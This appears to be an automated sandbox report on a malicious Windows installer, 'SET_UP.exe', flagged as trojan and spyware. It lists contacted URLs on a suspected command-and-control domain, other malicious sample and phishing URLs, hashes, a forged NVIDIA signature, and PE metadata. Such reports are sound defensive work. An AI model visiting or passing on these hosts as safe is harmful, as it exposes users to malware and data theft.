                                          https://glowscarrytsv.sbs/apisSET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://glowscarrytsv.sbs/apimSET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ocsp.starfieldtech.com/0DSET_UP.exefalse
                                            		high
                                            http://crl.thawte.com/ThawteTimestampingCA.crl0SET_UP.exefalse
                                              		high
                                              https://glowscarrytsv.sbs/apivSET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.remobjects.com/psSET_UP.exefalse
                                                		high
                                                http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.innosetup.com/SET_UP.exefalse
                                                          		high
                                                          https://glowscarrytsv.sbs/SET_UP.exe, 00000000.00000003.1766192279.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792533320.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793505529.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793064459.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805838052.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792493921.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782179637.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1806395718.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821548678.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.starfieldtech.com/repository/sfsroot.crl0PSET_UP.exefalse
                                                            		high
                                                            https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://crl.micro8SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ocsp.thawte.com0SET_UP.exefalse
                                                                  		high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://certificates.starfieldtech.com/repository/1604SET_UP.exefalse
                                                                            		high
                                                                            https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.symauth.com/cps0(SET_UP.exefalse
                                                                                		high
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://glowscarrytsv.sbs/api9SET_UP.exe, 00000000.00000003.1903390472.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://crl.starfieldtech.com/repository/0SET_UP.exefalse
                                                                                      		high
                                                                                      https://glowscarrytsv.sbs/api7SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.symauth.com/rpa00SET_UP.exefalse
                                                                                        		high
                                                                                        https://glowscarrytsv.sbs/BSET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://support.microsofSET_UP.exe, 00000000.00000003.1767425776.0000000003755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                188.114.97.3
                                                                                                		glowscarrytsv.sbsEuropean Union
                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1584813
                                                                                                Start date and time:2025-01-06 15:14:09 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 3m 25s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:4
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:SET_UP.exe
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 6
                                                                                                • Number of non-executed functions: 115
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 20.109.210.53, 4.245.163.56
                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                09:15:08API Interceptor8x Sleep call for process: SET_UP.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                188.114.97.3Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.cifasnc.info/8rr3/
                                                                                                dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • /api/get/free
                                                                                                dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                • /api/get/free
                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.rgenerousrs.store/o362/
                                                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.beylikduzu616161.xyz/2nga/
                                                                                                Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                • paste.ee/d/lxvbq
                                                                                                Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.ssrnoremt-rise.sbs/3jsc/

                                                                                                Domains

                                                                                                No context

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUShttp://jennadewanunwrapped.netGet hashmaliciousUnknownBrowse
                                                                                                • 188.114.97.3
                                                                                                http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9Get hashmaliciousUnknownBrowse
                                                                                                • 172.66.0.145
                                                                                                Profile Illustrations and Technical Specifications for This System1.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.21.80.1
                                                                                                fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.96.3
                                                                                                anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                • 188.114.96.3
                                                                                                title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                • 172.67.208.58
                                                                                                http://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.155.119
                                                                                                APLICATIVO-WINDOWS-NOTA-FISCAL.msiGet hashmaliciousAteraAgentBrowse
                                                                                                • 104.18.18.106
                                                                                                https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.17.25.14
                                                                                                Agent381.msiGet hashmaliciousUnknownBrowse
                                                                                                • 188.114.96.3

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                a0e9f5d64349fb13191bc781f81f42e1anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                • 188.114.97.3
                                                                                                title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                • 188.114.97.3
                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 188.114.97.3
                                                                                                un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                                • 188.114.97.3
                                                                                                installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 188.114.97.3

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                No created / dropped files found

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):0.7966240961351646
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                • Inno Setup installer (109748/4) 1.08%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:SET_UP.exe
                                                                                                File size:77'268'426 bytes
                                                                                                MD5:5b0bafdddbc54bcbc57b87dfb94d0c64
                                                                                                SHA1:80f9e34f49784e7d097ea9cdf3989133a688c726
                                                                                                SHA256:cedea9aa30ea6ae6d36937321225d8ad2d8e2ff21412ef2254817b0da028ed71
                                                                                                SHA512:31904c1b0f616fb1fccd5d293eb5df41a03db998cfe29d34ef88fedd175d6fcaf5d6b4b30219d0c8c8b96b4a2b3c7a9da95ad023a52eaaec2f0209c77ffcc9d9
                                                                                                SSDEEP:49152:YLJwSihjgb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTv0k7Ox1jWV9D:0wSiab67zeCzt0+yO3kSeuOr45
                                                                                                TLSH:F408B22DBF04396DCF0E29B5659383ECD826DF113B1188FF1694B568BA312DC86BA50D
                                                                                                File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                File Icon

                                                                                                Icon Hash:0427315d6d330600

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x6c3650
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x5FB0F970 [Sun Nov 15 09:48:32 2020 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:1
                                                                                                File Version Major:6
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:7c77b89cd344508d2ca812dd1c349c70

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                Subject Chain
                                                                                                • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                Version:3
                                                                                                Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFF0h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                mov eax, 006B8354h
                                                                                                call 00007FBD90853A8Ah
                                                                                                mov eax, dword ptr [006CCEACh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]
                                                                                                push FFFFFFECh
                                                                                                push eax
                                                                                                call 00007FBD90857E05h
                                                                                                mov edx, dword ptr [006CCEACh]
                                                                                                mov edx, dword ptr [edx]
                                                                                                mov edx, dword ptr [edx+00000188h]
                                                                                                and eax, FFFFFF7Fh
                                                                                                push eax
                                                                                                push FFFFFFECh
                                                                                                push edx
                                                                                                call 00007FBD90857DF1h
                                                                                                xor eax, eax
                                                                                                push ebp
                                                                                                push 006C36D4h
                                                                                                push dword ptr fs:[eax]
                                                                                                mov dword ptr fs:[eax], esp
                                                                                                push 00000001h
                                                                                                call 00007FBD90857154h
                                                                                                call 00007FBD90AFAF53h
                                                                                                mov eax, dword ptr [006B7F7Ch]
                                                                                                push eax
                                                                                                push 006B8014h
                                                                                                mov eax, dword ptr [006CCEACh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007FBD909FB5C0h
                                                                                                call 00007FBD90AFAFA7h
                                                                                                xor eax, eax
                                                                                                pop edx
                                                                                                pop ecx
                                                                                                pop ecx
                                                                                                mov dword ptr fs:[eax], edx
                                                                                                jmp 00007FBD90B0655Bh
                                                                                                jmp 00007FBD9084C39Ch
                                                                                                call 00007FBD90AFACEFh
                                                                                                mov eax, 00000001h
                                                                                                call 00007FBD9084CE85h
                                                                                                call 00007FBD9084C7E0h
                                                                                                mov eax, dword ptr [006CCEACh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, 006C3868h
                                                                                                call 00007FBD909FB097h
                                                                                                push 00000005h
                                                                                                mov eax, dword ptr [006CCEACh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]
                                                                                                push eax
                                                                                                call 00007FBD90857B1Ah
                                                                                                mov eax, dword ptr [006CCEACh]

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x2db0000x97.edata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2d60000x3934.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2de0000xbea00.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x49acc0a0x39c0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2dd0000x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2d69e40x8b8.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2da0000xbde.didata
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x2bf8500x2bfa0094768d0e79cacab8f82f6b8ab2b7b8e0unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .itext0x2c10000x28740x2a00a8ea4b7956e1b51171165830d3ce6a78False0.5008370535714286data6.108103601351959IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .data0x2c40000x91c80x9200586ad30a8215d7030e5320e27bce3ca4False0.5825128424657534data6.266972371639043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .bss0x2ce0000x78dc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .idata0x2d60000x39340x3a009a10d495545bbe0d0c173e5160012f77False0.33189655172413796data5.193230529657497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .didata0x2da0000xbde0xc002937589ef8b41cb66bf6ca8aa8fcd7afFalse0.349609375data4.403135759875134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .edata0x2db0000x970x2001fa460bfb714a17109f4d1b931b695e1False0.25data1.855121367761671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .tls0x2dc0000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rdata0x2dd0000x5d0x200ab111d8950af4c4fa175bda002954fdbFalse0.189453125data1.3651255461701644IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x2de0000xbea000xbea004e36fd7c06cb7b9a5ab7e23518c8e5efFalse0.36351434426229506data5.495461641285404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_CURSOR0x2ded680x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                RT_CURSOR0x2dee9c0x134dataEnglishUnited States0.4642857142857143
                                                                                                RT_CURSOR0x2defd00x134dataEnglishUnited States0.4805194805194805
                                                                                                RT_CURSOR0x2df1040x134dataEnglishUnited States0.38311688311688313
                                                                                                RT_CURSOR0x2df2380x134dataEnglishUnited States0.36038961038961037
                                                                                                RT_CURSOR0x2df36c0x134dataEnglishUnited States0.4090909090909091
                                                                                                RT_CURSOR0x2df4a00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                RT_BITMAP0x2df5d40xd28Device independent bitmap graphic, 48 x 48 x 8, image size 0, resolution 3780 x 3780 px/m, 256 important colors0.16508313539192399
                                                                                                RT_BITMAP0x2e02fc0x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 3779 x 3779 px/m0.2074074074074074
                                                                                                RT_ICON0x2e06280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.06961416693789389
                                                                                                RT_ICON0x3226500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.04637406837809062
                                                                                                RT_ICON0x332e780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1620217288615966
                                                                                                RT_ICON0x3370a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.24564315352697094
                                                                                                RT_ICON0x3396480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3067542213883677
                                                                                                RT_ICON0x33a6f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5044326241134752
                                                                                                RT_STRING0x33ab580x210data0.3125
                                                                                                RT_STRING0x33ad680x440data0.37683823529411764
                                                                                                RT_STRING0x33b1a80x2b4data0.45809248554913296
                                                                                                RT_STRING0x33b45c0x214data0.4605263157894737
                                                                                                RT_STRING0x33b6700x3e4data0.3885542168674699
                                                                                                RT_STRING0x33ba540x3a0data0.4191810344827586
                                                                                                RT_STRING0x33bdf40x1ecdata0.5609756097560976
                                                                                                RT_STRING0x33bfe00xccdata0.6666666666666666
                                                                                                RT_STRING0x33c0ac0x294data0.4681818181818182
                                                                                                RT_STRING0x33c3400x3e8data0.372
                                                                                                RT_STRING0x33c7280x488data0.41293103448275864
                                                                                                RT_STRING0x33cbb00x418data0.28435114503816794
                                                                                                RT_STRING0x33cfc80x370data0.4147727272727273
                                                                                                RT_STRING0x33d3380x39cdata0.41233766233766234
                                                                                                RT_STRING0x33d6d40x4a4data0.382996632996633
                                                                                                RT_STRING0x33db780x384data0.37333333333333335
                                                                                                RT_STRING0x33defc0x454data0.3935018050541516
                                                                                                RT_STRING0x33e3500x210data0.39015151515151514
                                                                                                RT_STRING0x33e5600xbcdata0.6542553191489362
                                                                                                RT_STRING0x33e61c0x100data0.62890625
                                                                                                RT_STRING0x33e71c0x338data0.4223300970873786
                                                                                                RT_STRING0x33ea540x3f0data0.34226190476190477
                                                                                                RT_STRING0x33ee440x314data0.38578680203045684
                                                                                                RT_STRING0x33f1580x2f8data0.38026315789473686
                                                                                                RT_RCDATA0x33f4500x10data1.5
                                                                                                RT_RCDATA0x33f4600x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                RT_RCDATA0x340c600xb6cdata0.5355677154582763
                                                                                                RT_RCDATA0x3417cc0x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                RT_RCDATA0x3419140x480Delphi compiled form 'TNewDiskForm'0.5034722222222222
                                                                                                RT_RCDATA0x341d940x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                RT_RCDATA0x3421940x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                RT_RCDATA0x34264c0x7ffDelphi compiled form 'TUninstallProgressForm'0.4054714215925745
                                                                                                RT_RCDATA0x342e4c0x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
